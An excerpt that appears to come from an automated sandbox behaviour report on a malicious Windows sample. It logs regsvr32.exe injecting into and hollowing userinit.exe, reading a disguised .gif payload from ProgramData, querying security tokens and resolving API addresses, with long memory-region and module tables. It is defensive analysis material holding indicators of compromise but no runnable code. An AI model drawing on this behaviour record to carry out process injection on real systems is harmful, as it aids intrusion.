Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d75266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d752542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d751d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d75238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7520c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d751fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d751e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d751f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d751ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d75216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7522be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7521e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8020ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8020b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8020c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8020d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 1118191	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #53: userinit.exe

222

0

»

Information	Value
ID	#53
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:19, Reason: Child Process
Unmonitor	End Time: 00:03:23, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x8e8
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 8E4 0x 8C4 0x 8CC

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x00050fff	Private Memory	rw	-
private_0x0000000000060000	0x00060000	0x00060fff	Private Memory	rwx	-
pagefile_0x0000000000070000	0x00070000	0x00076fff	Pagefile Backed Memory	r	-
private_0x0000000000080000	0x00080000	0x0017ffff	Private Memory	rw	-
locale.nls	0x00180000	0x001e6fff	Memory Mapped File	r	-
private_0x00000000001f0000	0x001f0000	0x0022ffff	Private Memory	rw	-
pagefile_0x0000000000230000	0x00230000	0x002f7fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000300000	0x00300000	0x003defff	Pagefile Backed Memory	r	-
private_0x00000000003e0000	0x003e0000	0x003effff	Private Memory	rw	-
pagefile_0x00000000003f0000	0x003f0000	0x003f1fff	Pagefile Backed Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	-	-
private_0x0000000000680000	0x00680000	0x006fffff	Private Memory	rw	-
oleaccrc.dll	0x00700000	0x00700fff	Memory Mapped File	r	-
private_0x0000000000710000	0x00710000	0x00710fff	Private Memory	rwx	-
pagefile_0x0000000000720000	0x00720000	0x00721fff	Pagefile Backed Memory	r	-
private_0x0000000000730000	0x00730000	0x0073ffff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007c0fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007c4fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007c8fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007ccfff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007d0fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007d4fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007d8fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007dcfff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007e0fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007e4fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007e8fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007ecfff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007f0fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007f4fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007f8fff	Private Memory	rw	-
private_0x0000000000740000	0x00740000	0x007fcfff	Private Memory	rw	-
windowsshell.manifest	0x00740000	0x00740fff	Memory Mapped File	r	-
private_0x0000000000780000	0x00780000	0x007bffff	Private Memory	rw	-
userinit.exe	0x00800000	0x00808fff	Memory Mapped File	rwx	-
pagefile_0x0000000000810000	0x00810000	0x0140ffff	Pagefile Backed Memory	r	-
private_0x0000000001410000	0x01410000	0x014fffff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x01492fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x01496fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x0149afff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x0149efff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014a2fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014a6fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014aafff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014aefff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014b2fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014b6fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014bafff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014befff	Private Memory	rw	-
private_0x00000000014c0000	0x014c0000	0x014fffff	Private Memory	rw	-
private_0x0000000001500000	0x01500000	0x015cffff	Private Memory	rw	-
staticcache.dat	0x015d0000	0x01efffff	Memory Mapped File	r	-
pagefile_0x0000000001f00000	0x01f00000	0x022f2fff	Pagefile Backed Memory	r	-
private_0x0000000002300000	0x02300000	0x0240cfff	Private Memory	rw	-
private_0x0000000002410000	0x02410000	0x0250ffff	Private Memory	rw	-
private_0x0000000002510000	0x02510000	0x0270ffff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027c2fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027c6fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027cafff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027cefff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027d4fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027d8fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027dcfff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027e2fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027e6fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027eafff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027eefff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027f4fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027f8fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027fcfff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02802fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02806fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x0280afff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x0280efff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02814fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02818fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x0281cfff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x02890fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028a6fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028aafff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028aefff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028c4fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028c8fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028ccfff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028d0fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028e6fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028eafff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028eefff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02904fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02908fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x0290cfff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02910fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02926fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0292afff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0292ffff	Private Memory	-	-
private_0x00000000028a0000	0x028a0000	0x02962fff	Private Memory	rw	-
private_0x00000000028b0000	0x028b0000	0x02980fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029c2fff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x029e0fff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x02a22fff	Private Memory	rw	-
private_0x0000000002930000	0x02930000	0x02a42fff	Private Memory	rwx	-
private_0x0000000002a50000	0x02a50000	0x02b4ffff	Private Memory	-	-
private_0x0000000002bf0000	0x02bf0000	0x02ceffff	Private Memory	rw	-
sortdefault.nls	0x02cf0000	0x02fbefff	Memory Mapped File	r	-
comctl32.dll	0x6d740000	0x6d7c3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d820000	0x6d838fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffd5008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0x8e4, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d820000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d740000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = üî", size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d77266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d772542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d771d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d77238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7720c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d771fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d771e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d771f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d771ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d77216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7722be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7721e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8220ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8220b7	1	Fn
